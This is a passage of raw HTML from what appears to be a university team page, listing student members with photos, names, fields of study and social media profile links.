align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c149\" class=\"d-block style-918 style-local-182-c149 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg\" class=\"wp-image-1597 style-918-image style-local-182-c149-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c149-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c150\" class=\"h-global-transition-all h-heading style-914 style-local-182-c150 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c150\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c151\" class=\"h-text h-text-component style-915 style-local-182-c151 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c152\" class=\"style-919 style-local-182-c152 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c153-outer\">\n            <div data-colibri-id=\"182-c153\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c153 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c154\" class=\"d-block style-920 style-local-182-c154 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg\" class=\"wp-image-884 style-920-image style-local-182-c154-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c154-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c155\" class=\"h-global-transition-all h-heading style-914 style-local-182-c155 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c155\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c156\" class=\"h-text h-text-component style-915 style-local-182-c156 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c157\" class=\"style-921 style-local-182-c157 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c158-outer\">\n            <div data-colibri-id=\"182-c158\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c158 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c159\" class=\"d-block style-922 style-local-182-c159 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg\" class=\"wp-image-776 style-922-image style-local-182-c159-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c159-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c160\" class=\"h-global-transition-all h-heading style-914 style-local-182-c160 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c160\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c161\" class=\"h-text h-text-component style-915 style-local-182-c161 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c162\" class=\"style-923 style-local-182-c162 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c163-outer\">\n            <div data-colibri-id=\"182-c163\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c163 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c164\" class=\"d-block style-913 style-local-182-c164 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg\" class=\"wp-image-831 style-913-image style-local-182-c164-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c164-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c165\" class=\"h-global-transition-all h-heading style-914 style-local-182-c165 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c165\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c166\" class=\"h-text h-text-component style-915 style-local-182-c166 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c167\" class=\"style-917 style-local-182-c167 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c168-outer\">\n            <div data-colibri-id=\"182-c168\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c168 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c169\" class=\"d-block style-913 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg\" class=\"wp-image-1007 style-913-image style-local-182-c169-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c169-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c170\" class=\"h-global-transition-all h-heading style-914 style-local-182-c170 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c170\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c171\" class=\"h-text h-text-component style-915 style-local-182-c171 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c172\" class=\"style-917 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c173-outer\">\n            <div data-colibri-id=\"182-c173\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c173 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c174\" class=\"d-block style-913 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal-1.jpeg\" class=\"wp-image-1599 style-913-image style-local-182-c174-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c174-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c175\" class=\"h-global-transition-all h-heading style-914 style-local-182-c175 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c175\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c176\" class=\"h-text h-text-component style-915 style-local-182-c176 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c177\" class=\"style-917 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c178-outer\">\n            <div data-colibri-id=\"182-c178\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c178 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c179\" class=\"d-block style-913 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg\" class=\"wp-image-853 style-913-image style-local-182-c179-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c179-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c180\" class=\"h-global-transition-all h-heading style-914 style-local-182-c180 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c180\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c181\" class=\"h-text h-text-component style-915 style-local-182-c181 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c182-outer\">\n            <div data-colibri-id=\"182-c182\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c182 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c183\" class=\"d-block style-913 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg\" class=\"wp-image-1600 style-913-image style-local-182-c183-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c183-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"h-global-transition-all h-heading style-914 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c184\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c185\" class=\"h-text h-text-component style-915 style-local-182-c185 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c186\" class=\"style-917 style-local-182-c186 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 